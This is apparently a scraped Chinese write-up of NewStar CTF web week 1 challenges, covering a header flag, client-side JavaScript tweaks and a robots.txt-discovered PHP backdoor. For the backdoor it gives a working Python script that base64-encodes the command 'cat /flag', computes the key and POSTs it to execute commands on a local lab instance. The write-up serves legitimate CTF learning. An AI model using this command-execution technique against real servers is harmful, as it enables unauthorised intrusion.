当前位置: 首页 > news >正文

2025-1-21 Newstar CTF web week1 wp

文章目录

  • week1
    • headach3
    • 会赢吗
    • 智械危机

week1

headach3

根据提示,在页面的请求头里找到flag
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

在这里插入图片描述

会赢吗

打开控制台,拿到第一部分flag
在这里插入图片描述
将地址栏改为提示,去到下一关在这里插入图片描述
控制台调用函数,得到flag
在这里插入图片描述
进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去
在这里插入图片描述
看题解才发现原来是要修改if指向的条件值在这里插入图片描述
去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可

智械危机

进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入在这里插入图片描述
在这里插入图片描述
函数部分的逻辑好理解,接下来解释一下if部分的逻辑在这里插入图片描述
在这里插入图片描述在这里插入图片描述
所以我们所看到的当前网页其实就是else语句执行后的结果
在这里插入图片描述
在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell

from hashlib import *
from random import  *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={'cmd':base_cmd,'key':key
}
responce=post(url,data=payload)
print(responce.text)
http://www.lryc.cn/news/524570.html

相关文章:

  • 【系统架构】如何设计一个秒杀系统?
  • C++模拟实现queue
  • 【2025小年源码免费送】
  • PyQt5 超详细入门级教程上篇
  • qiankun+vite+vue3
  • 【数据结构】顺序队列与链式队列
  • Cursor的详细使用指南
  • 2025美赛数学建模B题思路+模型+代码+论文
  • 2024年度总结-CSDN
  • 2024国游销量前20游戏分析:某开放世界武侠(排名11)
  • 如何使用python技术爬取下载百度文库文档?
  • navicat无法连接虚拟机的docker中的mysql
  • 如何使用CRM数据分析优化销售和客户关系?
  • 【Unity3D】3D物体摆放、场景优化案例Demo
  • 使用HTML5 Canvas 实现呼吸粒子球动画效果的原理
  • Java 中实体类与操作类分离
  • 【STM32HAL-----GPIO】
  • Java Web开发高级——单元测试与集成测试
  • 编译chromium笔记
  • Web开发 -前端部分-CSS3新特性
  • 【基础篇】什么是SQL注入,如何防止?
  • Swift语言的数据结构
  • 牛客周赛 Round 77
  • 浅谈云端编辑器,分析其亮点与不足
  • web应用引入cookie机制的用途和cookie技术主要包括的内容
  • 【HTML+CSS】使用HTML与后端技术连接数据库
  • 「2024·我的成长之路」:年终反思与展望
  • C#PaddleOCRSharp使用
  • 【Excel】【VBA】Reaction超限点筛选与散点图可视化
  • 京华春梦,守岁这方烟火人间